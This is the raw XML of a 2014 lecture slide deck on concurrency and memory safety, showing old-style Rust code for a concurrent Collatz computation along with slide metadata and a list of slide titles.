              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>mut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>found_result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> = false;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>    let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>mut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> result = -1; // need to initialize                                                                                                                                                                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>    while !</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>found_result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>        let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>mut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> ports = ~[];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>        for i in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>(0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>max_tasks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
              <a:t>            let val = n + i;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>            let (port, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>chan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>) : (Port&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&gt;, Chan&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&gt;) = Chan::new();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1400" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1400" dirty="0" err="1"/>
              <a:t>ports.push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1400" dirty="0" err="1"/>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1400" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES_tradnl" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" err="1"/>
              <a:t>spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0"/>
              <a:t>(proc() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>               let steps = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>collatz_steps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>println</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>!("Result for {}: {}", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, steps);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>chan.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(steps);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>            });</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" smtClean="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5338780" y="396688"/>
            <a:ext cx="3485929" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DDD9C3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> for i in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>(0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>max_tasks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>            let port = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>ports.pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>            let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>steps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>port.recv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            if steps &gt; k {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>found_result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = true;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0"/>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0" err="1"/>
              <a:t>result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0"/>
              <a:t> = n + i;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0"/>
              <a:t>            }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0"/>
              <a:t>        }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0"/>
              <a:t>        n += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0" err="1"/>
              <a:t>max_tasks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fi-FI" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>assert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>!(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> != -1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>result</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ"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95720" y="143280"/>
              <a:ext cx="8018640" cy="4605120"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="5" name="Ink 4"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="486360" y="133920"/>
                <a:ext cx="8037360" cy="4623840"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3870940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526"/>
            <a:ext cx="8229600" cy="2299384"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4900" dirty="0" smtClean="0"/>
              <a:t>A Much Better Way</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Loren </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Fryxell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25077096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24100</TotalTime>
  <Words>2356</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>358</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Class 8</vt:lpstr>
      <vt:lpstr>Plan for Today</vt:lpstr>
      <vt:lpstr>Exam 1</vt:lpstr>
      <vt:lpstr>Any Questions?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Concurrent Collatz Challenge</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>A Much Better Way  Loren Fryxell  </vt:lpstr>
      <vt:lpstr>Memory Management</vt:lpstr>
      <vt:lpstr>C Memory Management</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>A More Realistic Example</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Berkeley Software Distribution</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Exploiting the BSD4.3 version</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Stack Smashing Defense</vt:lpstr>
      <vt:lpstr>No-Execute Pages</vt:lpstr>
      <vt:lpstr>Stack Smashing Defense #2</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>(Why) Doesn’t C++ solve this?</vt:lpstr>
      <vt:lpstr>Doesn’t Java solve this?</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254</cp:revision>
  <cp:lastPrinted>2014-01-30T14:57:33Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-08-26T17:24:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-02-17T15:23:32Z</dcterms:modified>
</cp:coreProperties>
</file>